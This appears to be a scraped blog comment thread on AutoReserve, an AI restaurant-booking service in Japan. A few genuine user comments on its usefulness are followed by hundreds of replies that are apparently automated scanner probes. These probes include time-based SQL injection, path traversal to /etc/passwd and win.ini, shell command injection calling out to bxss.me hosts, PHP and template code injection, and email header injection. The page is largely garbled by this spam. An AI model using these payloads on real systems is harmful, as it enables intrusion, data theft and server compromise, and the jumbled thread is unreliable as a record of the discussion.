I tried to use it to book tenhaku but it didn't work. But it is an interesting concept of using ai to make reservations. And the reservation price is quite cheap
Doesn't seem very useful. Tried booking a number of restaurants throughout the day and it refused to let me log in as I have login too many times. And frequency of calls seems to be in the range of every 40 mins once. Might be good for only those less popular restaurants.
Tried using it to book Sharikimon Chawanbu, and received an unsuccessful response after 3 days (they tried for 2 days but couldn’t get through).
Succeeded in reserving twice on previous occasions by simply calling, and didn’t find it to be a terribly hard reservation to make. So I wasn’t impressed with Autoreserve, haha.
I've never used it, but when I was booking some stuff a couple months back I noticed at least two places (can't remember which now) whose shops had AutoReserve pages said explicitly on their website that they would not accept AutoReserve. So (i) I guess the shops aren't too impressed with it either (haha) and (ii) I generally take a dim view of companies that list restaurants on their site without permission. Reminds me of the situation here in the U.S. where delivery apps will list restaurants on their sites (with the associated obscene cuts of the revenue) without ever getting permission from the restaurant itself.
It just seems like services like Autoreserve, Percotter, etc. have an increasingly limited use case. In recent years, many new joints (frequently run by younger chefs) have started taking reservations online on Tablecheck, Toreta, or even just IG. So companies like Autoreserve aren't needed for those. At the high-end, many well-reviewed restaurants have either partnered with Omakase, Tableall, or require phone-camping at specific times to get seats, so again, a service that calls once every 40mins isn't useful there.
So what we're left with is the awkward middle-ground of restaurants that are under the radar, and run by old-school chefs who don't do online reservations. And only if you're staying at a hotel without a concierge (otherwise your concierge can easily book, since it's under the radar).
It's a little odd to me to imagine a restaurant would on one hand not use online booking, but on the other be ok with robots calling (/harassing) them to make reservations. That being said Pecotter and the likes often come on top of google search, so maybe they work,,, or maybe they have really good SEO.
I think it should be like all other online concierges. They might have partnership with certain restaurants, whereas others they only will call but there is likely no hope of getting a reservation.
I remember seeing certain restaurants charging full amount when you make a reservation whereas others are charging 1000JPY.
8 Comments
I tried to use it to book tenhaku but it didn't work. But it is an interesting concept of using ai to make reservations. And the reservation price is quite cheap
re: guest
DX84Bh1d
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+46-46-1=0+0+0+1
re: guest
-1 OR 3+46-46-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
te5fClNN'; waitfor delay '0:0:15' --
re: guest
-5 OR 961=(SELECT 961 FROM PG_SLEEP(15))--
re: guest
-5) OR 902=(SELECT 902 FROM PG_SLEEP(15))--
re: guest
-1)) OR 121=(SELECT 121 FROM PG_SLEEP(15))--
re: guest
eJrFMpVi' OR 625=(SELECT 625 FROM PG_SLEEP(15))--
re: guest
kDJWta2d') OR 591=(SELECT 591 FROM PG_SLEEP(15))--
re: guest
joFJzdK1')) OR 450=(SELECT 450 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@iKFXC
re: guest
MCx7nZOK
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+362-362-1=0+0+0+1
re: guest
-1 OR 3+362-362-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
6GV3HVSP'; waitfor delay '0:0:15' --
re: guest
-5 OR 314=(SELECT 314 FROM PG_SLEEP(15))--
re: guest
-5) OR 621=(SELECT 621 FROM PG_SLEEP(15))--
re: guest
-1)) OR 472=(SELECT 472 FROM PG_SLEEP(15))--
re: guest
RLm86hqb' OR 606=(SELECT 606 FROM PG_SLEEP(15))--
re: guest
XuYYZPBs') OR 972=(SELECT 972 FROM PG_SLEEP(15))--
re: guest
p73KzAKf')) OR 83=(SELECT 83 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@HFO3k
re: guest
1ZzpmqoVO
re: guest
response.write(9708793*9061780)
re: guest
%0abcc:074625.67-13697.67.2aebf.19990.2@bxss.me
re: guest
'+response.write(9708793*9061780)+'
re: guest
to@example.com>%0d%0abcc:074625.67-13698.67.2aebf.19990.2@bxss.me
re: guest
"+response.write(9708793*9061780)+"
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
${9999063+10000268}
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
/etc/passwd
re: guest
%2fetc%2fpasswd
re: guest
echo rccnms$()\ uwogns\nz^xyu||a #' &echo rccnms$()\ uwogns\nz^xyu||a #|" &echo rccnms$()\ uwogns\nz^xyu||a #
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
&echo intfrq$()\ rizrcb\nz^xyu||a #' &echo intfrq$()\ rizrcb\nz^xyu||a #|" &echo intfrq$()\ rizrcb\nz^xyu||a #
re: guest
)
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
|echo czitmb$()\ nadxmr\nz^xyu||a #' |echo czitmb$()\ nadxmr\nz^xyu||a #|" |echo czitmb$()\ nadxmr\nz^xyu||a #
re: guest
!(()&&!|*|*|
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
(nslookup hitgkbgqqpsrl75ca0.bxss.me||perl -e "gethostbyname('hitgkbgqqpsrl75ca0.bxss.me')")
re: guest
^(#$!@#$)(()))******
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
$(nslookup hithieweqcmfa36572.bxss.me||perl -e "gethostbyname('hithieweqcmfa36572.bxss.me')")
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
&nslookup hitlxnuoeutqh0f9dd.bxss.me&'\"`0&nslookup hitlxnuoeutqh0f9dd.bxss.me&`'
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
&(nslookup hitjxuqejiodwc41e6.bxss.me||perl -e "gethostbyname('hitjxuqejiodwc41e6.bxss.me')")&'\"`0&(nslookup hitjxuqejiodwc41e6.bxss.me||perl -e "gethostbyname('hitjxuqejiodwc41e6.bxss.me')")&`'
re: guest
file:///etc/passwd
re: guest
|(nslookup hithhwerdysvdb7c23.bxss.me||perl -e "gethostbyname('hithhwerdysvdb7c23.bxss.me')")
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
`(nslookup hitvvigqfpdxx4740e.bxss.me||perl -e "gethostbyname('hitvvigqfpdxx4740e.bxss.me')")`
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
'.gethostbyname(lc('hitek'.'zihygqpya2f48.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(73).chr(108).chr(87).'
re: guest
/WEB-INF/web.xml
re: guest
;(nslookup hitwplemxgrkfd24ca.bxss.me||perl -e "gethostbyname('hitwplemxgrkfd24ca.bxss.me')")|(nslookup hitwplemxgrkfd24ca.bxss.me||perl -e "gethostbyname('hitwplemxgrkfd24ca.bxss.me')")&(nslookup hitwplemxgrkfd24ca.bxss.me||perl -e "gethostbyname('hitwplemxgrkfd24ca.bxss.me')")
re: guest
".gethostbyname(lc("hitiz"."mmjqlwdtcd938.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(71).chr(101).chr(74)."
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
Http://bxss.me/t/fit.txt
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
/../../../../../../../../../../boot.ini
re: guest
/etc/shells
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
c:/windows/win.ini
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
bxss.me
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
WEB-INF/web.xml
re: guest
WEB-INF\web.xml
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
';print(md5(31337));$a='
re: guest
";print(md5(31337));$a="
re: guest
${@print(md5(31337))}
re: guest
${@print(md5(31337))}\
re: guest
'.print(md5(31337)).'
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
"+"A".concat(70-3).concat(22*4).concat(97).concat(79).concat(115).concat(72)+(require"socket"
Socket.gethostbyname("hitji"+"eipgjydm2a000.bxss.me.")[3].to_s)+"
re: guest
bxss.me/t/xss.html?%00
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
'+'A'.concat(70-3).concat(22*4).concat(119).concat(73).concat(98).concat(73)+(require'socket'
Socket.gethostbyname('hitix'+'bntdfifxb3444.bxss.me.')[3].to_s)+'
re: guest
'"
re: guest
<!--
re: guest
1
re: guest
1
re: guest
-1 OR 2+147-147-1=0+0+0+1 --
re: guest
-1 OR 3+147-147-1=0+0+0+1 --
re: guest
-1 OR 2+677-677-1=0+0+0+1
re: guest
-1 OR 3+677-677-1=0+0+0+1
re: guest
-1' OR 2+404-404-1=0+0+0+1 --
re: guest
-1' OR 3+404-404-1=0+0+0+1 --
re: guest
-1' OR 2+473-473-1=0+0+0+1 or 'a6wdc0Hc'='
re: guest
-1' OR 3+473-473-1=0+0+0+1 or 'a6wdc0Hc'='
re: guest
-1" OR 2+617-617-1=0+0+0+1 --
re: guest
-1" OR 3+617-617-1=0+0+0+1 --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
TXpjhF01'; waitfor delay '0:0:15' --
re: guest
-5 OR 76=(SELECT 76 FROM PG_SLEEP(15))--
re: guest
-5) OR 713=(SELECT 713 FROM PG_SLEEP(15))--
re: guest
-1)) OR 321=(SELECT 321 FROM PG_SLEEP(15))--
re: guest
hALSadD2' OR 383=(SELECT 383 FROM PG_SLEEP(15))--
re: guest
eICRPnH9') OR 728=(SELECT 728 FROM PG_SLEEP(15))--
re: guest
Mf0MmkiG')) OR 382=(SELECT 382 FROM PG_SLEEP(15))--
re: guest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@fN9Ro
re: guest
1
re: guest
1
re: guest
1
re: guest
1
re: guest
1
re: guest
1
Doesn't seem very useful. Tried booking a number of restaurants throughout the day and it refused to let me log in as I have login too many times. And frequency of calls seems to be in the range of every 40 mins once. Might be good for only those less popular restaurants.
re: guest
DbQKdeAx
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+177-177-1=0+0+0+1
re: guest
-1 OR 3+177-177-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
X8pzX1pe'; waitfor delay '0:0:15' --
re: guest
-5 OR 426=(SELECT 426 FROM PG_SLEEP(15))--
re: guest
-5) OR 960=(SELECT 960 FROM PG_SLEEP(15))--
re: guest
-1)) OR 630=(SELECT 630 FROM PG_SLEEP(15))--
re: guest
bo5YKqYZ' OR 374=(SELECT 374 FROM PG_SLEEP(15))--
re: guest
Jj7DFq7C') OR 747=(SELECT 747 FROM PG_SLEEP(15))--
re: guest
ahB3lTmv')) OR 410=(SELECT 410 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@NSW3a
re: guest
dxF8Jf1j
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+796-796-1=0+0+0+1
re: guest
-1 OR 3+796-796-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
UN2AguTh'; waitfor delay '0:0:15' --
re: guest
-5 OR 903=(SELECT 903 FROM PG_SLEEP(15))--
re: guest
-5) OR 549=(SELECT 549 FROM PG_SLEEP(15))--
re: guest
-1)) OR 216=(SELECT 216 FROM PG_SLEEP(15))--
re: guest
gHIGZ9rX' OR 926=(SELECT 926 FROM PG_SLEEP(15))--
re: guest
pjYNWCOY') OR 708=(SELECT 708 FROM PG_SLEEP(15))--
re: guest
Wq5QGHwc')) OR 378=(SELECT 378 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@95F8l
re: guest
1gkc4goQO
re: guest
response.write(9382382*9986103)
re: guest
'+response.write(9382382*9986103)+'
re: guest
"+response.write(9382382*9986103)+"
re: guest
%0abcc:074625.67-13784.67.3bdc6.19990.2@bxss.me
re: guest
to@example.com>%0d%0abcc:074625.67-13785.67.3bdc6.19990.2@bxss.me
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
${9999960+9999849}
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
'.gethostbyname(lc('hitbc'.'atcrftdo8323c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(74).chr(110).chr(72).'
re: guest
)
re: guest
".gethostbyname(lc("hitls"."uqvcevvc03c1b.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(67).chr(104).chr(82)."
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
!(()&&!|*|*|
re: guest
/etc/passwd
re: guest
echo omlcrd$()\ pvxnfp\nz^xyu||a #' &echo omlcrd$()\ pvxnfp\nz^xyu||a #|" &echo omlcrd$()\ pvxnfp\nz^xyu||a #
re: guest
^(#$!@#$)(()))******
re: guest
%2fetc%2fpasswd
re: guest
&echo dyylsq$()\ tzmaeh\nz^xyu||a #' &echo dyylsq$()\ tzmaeh\nz^xyu||a #|" &echo dyylsq$()\ tzmaeh\nz^xyu||a #
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
|echo dfsvca$()\ cbsyte\nz^xyu||a #' |echo dfsvca$()\ cbsyte\nz^xyu||a #|" |echo dfsvca$()\ cbsyte\nz^xyu||a #
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
(nslookup hitqlvsyodpne0fa67.bxss.me||perl -e "gethostbyname('hitqlvsyodpne0fa67.bxss.me')")
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
$(nslookup hitlgqzoizlfka82a8.bxss.me||perl -e "gethostbyname('hitlgqzoizlfka82a8.bxss.me')")
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
&nslookup hitjmoiqzlngqdffeb.bxss.me&'\"`0&nslookup hitjmoiqzlngqdffeb.bxss.me&`'
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
